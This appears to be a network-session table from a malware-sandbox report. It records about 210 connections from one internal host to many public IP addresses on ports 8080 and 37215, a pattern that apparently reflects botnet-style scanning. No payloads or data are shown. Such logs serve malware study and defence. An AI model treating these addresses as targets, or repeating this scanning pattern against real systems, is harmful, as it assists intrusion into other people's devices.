                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23078192.168.2.235935063.12.168.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23079192.168.2.236088434.153.114.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23080192.168.2.2346726201.69.29.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23081192.168.2.2352066150.5.64.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23082192.168.2.2348990180.242.53.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23083192.168.2.2338482153.151.56.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23084192.168.2.2350384174.153.136.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23085192.168.2.235437671.155.102.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23086192.168.2.234860013.27.185.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23087192.168.2.234339086.87.100.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23088192.168.2.2347614142.24.91.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23089192.168.2.2353844198.187.228.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23090192.168.2.2355942117.67.105.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23091192.168.2.2343228192.238.135.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23092192.168.2.2341406162.113.163.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23093192.168.2.2335834121.70.228.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23094192.168.2.2336142198.88.182.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23095192.168.2.2335626192.179.251.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23096192.168.2.234622097.72.226.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23097192.168.2.235692678.59.196.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23098192.168.2.235298238.155.53.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23099192.168.2.23381202.35.239.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23100192.168.2.23415488.104.244.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23101192.168.2.2338738223.110.168.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23102192.168.2.2357738133.224.111.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23103192.168.2.235864280.225.156.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23104192.168.2.2349790165.85.92.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23105192.168.2.2349430202.251.121.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23106192.168.2.2339728221.21.61.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23107192.168.2.2342592195.87.162.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23108192.168.2.2335822105.240.253.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23109192.168.2.2359404148.28.70.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23110192.168.2.23363308.188.178.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23111192.168.2.2344584106.31.84.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23112192.168.2.234361842.15.21.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23113192.168.2.235951641.43.121.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23114192.168.2.2358908217.140.152.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23115192.168.2.235416458.246.159.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23116192.168.2.2359370204.247.81.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23117192.168.2.234495097.45.166.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23118192.168.2.233555436.72.246.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23119192.168.2.236061676.252.102.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23120192.168.2.2355976210.65.68.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23121192.168.2.2339404213.122.209.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23122192.168.2.234338476.143.98.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23123192.168.2.2337366177.126.247.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23124192.168.2.234094895.214.86.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23125192.168.2.2360730142.169.44.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23126192.168.2.2356476113.14.112.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23127192.168.2.233407479.252.146.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23128192.168.2.233671681.163.22.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23129192.168.2.2335678205.201.123.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23130192.168.2.2356044164.228.141.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23131192.168.2.2345382117.203.38.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23132192.168.2.2359084193.81.3.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23133192.168.2.2339042181.162.68.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23134192.168.2.2333662129.60.27.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23135192.168.2.2355966131.129.172.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23136192.168.2.235359497.108.212.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23137192.168.2.2335328140.199.192.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23138192.168.2.235765018.229.120.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23139192.168.2.2336888218.217.75.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23140192.168.2.2339258212.249.111.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23141192.168.2.2349990112.10.79.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23142192.168.2.234499873.156.125.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23143192.168.2.2357248220.224.204.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23144192.168.2.235723469.158.253.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23145192.168.2.235094090.144.174.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23146192.168.2.235970227.64.211.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23147192.168.2.233993880.26.153.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23148192.168.2.2351618171.58.250.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23149192.168.2.233495850.52.106.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23150192.168.2.23483221.120.103.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23151192.168.2.2345654179.125.194.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23152192.168.2.2358878158.102.28.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23153192.168.2.2347102140.180.238.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23154192.168.2.234926678.211.185.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23155192.168.2.235510452.90.77.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23156192.168.2.234887679.51.215.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23157192.168.2.2348058138.233.10.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23158192.168.2.233456666.119.132.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23159192.168.2.2332980194.76.32.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23160192.168.2.235896474.113.54.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23161192.168.2.2352268137.37.137.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23162192.168.2.234986685.192.86.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23163192.168.2.2342844175.74.162.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23164192.168.2.2345516123.85.150.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23165192.168.2.23597165.185.47.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23166192.168.2.2353146104.38.22.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23167192.168.2.2342646135.76.91.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23168192.168.2.233443285.239.123.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23169192.168.2.235490054.86.232.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23170192.168.2.2350420191.54.8.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23171192.168.2.2340916182.44.171.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23172192.168.2.235965424.210.237.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23173192.168.2.2359464182.15.238.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23174192.168.2.2345700203.1.44.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23175192.168.2.2353864107.85.235.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23176192.168.2.2338020175.202.190.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23177192.168.2.235300646.129.150.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23178192.168.2.2342060146.128.156.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23179192.168.2.2348496198.6.37.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23180192.168.2.2355062123.226.148.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23181192.168.2.2335622143.187.237.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23182192.168.2.236067298.57.212.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23183192.168.2.23359761.210.212.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23184192.168.2.2337784149.185.23.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23185192.168.2.2336538135.189.53.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23186192.168.2.2340428148.35.6.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23187192.168.2.233643450.83.5.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23188192.168.2.235040295.107.205.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23189192.168.2.233874283.21.171.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23190192.168.2.2340556159.84.223.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23191192.168.2.234660493.41.207.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23192192.168.2.2350772172.216.78.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23193192.168.2.233571664.241.188.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23194192.168.2.2333310191.154.60.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23195192.168.2.2337910111.224.222.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23196192.168.2.2345808206.186.57.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23197192.168.2.234378093.243.166.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23198192.168.2.2342690184.255.214.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23199192.168.2.2338692147.170.96.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23200192.168.2.2346372157.213.103.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23201192.168.2.2356702133.153.189.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23202192.168.2.2353292197.47.108.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23203192.168.2.2350166197.163.39.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23204192.168.2.234048441.94.250.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23205192.168.2.2351184117.230.48.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23206192.168.2.2355212157.23.114.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23207192.168.2.2354696157.148.18.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23208192.168.2.2343492157.158.31.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23209192.168.2.233997641.237.250.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23210192.168.2.2353290157.228.236.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23211192.168.2.233685041.221.225.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23212192.168.2.235345041.142.115.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23213192.168.2.2348596157.140.90.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23214192.168.2.2346862157.177.50.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23215192.168.2.2348302157.251.171.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23216192.168.2.2343692157.12.37.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23217192.168.2.2336092197.6.5.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23218192.168.2.2358794197.201.66.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23219192.168.2.233893841.31.242.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23220192.168.2.234007441.22.227.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23221192.168.2.2346348197.32.44.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23222192.168.2.235707027.52.18.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23223192.168.2.2343634197.28.165.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23224192.168.2.2345744197.165.166.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23225192.168.2.2353426116.203.84.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23226192.168.2.2344016157.190.200.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23227192.168.2.235986241.127.134.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23228192.168.2.2346790197.152.206.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23229192.168.2.2341050197.152.241.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23230192.168.2.235492041.254.34.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23231192.168.2.234748441.34.36.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23232192.168.2.235376841.152.113.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23233192.168.2.2351820197.146.107.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23234192.168.2.233383844.84.104.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23235192.168.2.2350326157.245.133.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23236192.168.2.235467441.167.175.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23237192.168.2.2336038157.155.26.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23238192.168.2.2337258197.119.57.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23239192.168.2.234099641.153.188.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23240192.168.2.234026241.75.171.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23241192.168.2.2335322157.35.123.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23242192.168.2.2357560157.198.111.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23243192.168.2.234766641.32.63.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23244192.168.2.2338640170.75.191.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23245192.168.2.234434273.251.218.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23246192.168.2.234082441.171.174.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23247192.168.2.234072241.243.122.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23248192.168.2.2343016157.109.55.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23249192.168.2.2339556136.109.105.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23250192.168.2.234136837.173.182.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23251192.168.2.2342298157.236.6.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23252192.168.2.2350474116.217.7.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23253192.168.2.235990241.241.195.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23254192.168.2.2336140157.253.184.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23255192.168.2.235897041.204.84.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23256192.168.2.234576035.11.133.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23257192.168.2.233820041.201.144.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23258192.168.2.2353052121.211.226.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23259192.168.2.2345264157.221.119.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23260192.168.2.2334762171.36.193.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23261192.168.2.233668881.120.238.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23262192.168.2.235488241.137.30.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23263192.168.2.2350204197.9.191.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23264192.168.2.2357224194.125.192.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23265192.168.2.2341794181.192.228.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23266192.168.2.2334810157.94.3.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23267192.168.2.235663041.252.204.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23268192.168.2.233587641.189.200.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23269192.168.2.2338428197.224.192.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23270192.168.2.236028241.54.69.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23271192.168.2.234170442.158.180.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23272192.168.2.2360370157.201.33.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23273192.168.2.2345958157.41.167.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23274192.168.2.2337848197.52.14.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23275192.168.2.2352500157.232.179.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23276192.168.2.235497641.34.191.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23277192.168.2.2345848197.155.188.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23278192.168.2.2341358100.155.6.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23279192.168.2.2357596157.137.179.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23280192.168.2.2343654213.244.160.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23281192.168.2.2340636197.43.34.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23282192.168.2.2351664218.21.238.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23283192.168.2.2360388197.133.55.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23284192.168.2.2335982157.25.20.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23285192.168.2.2334826197.17.238.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23286192.168.2.235777699.3.209.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23287192.168.2.233450841.23.214.22737215
                                                        TimestampBytes transferredDirectionData


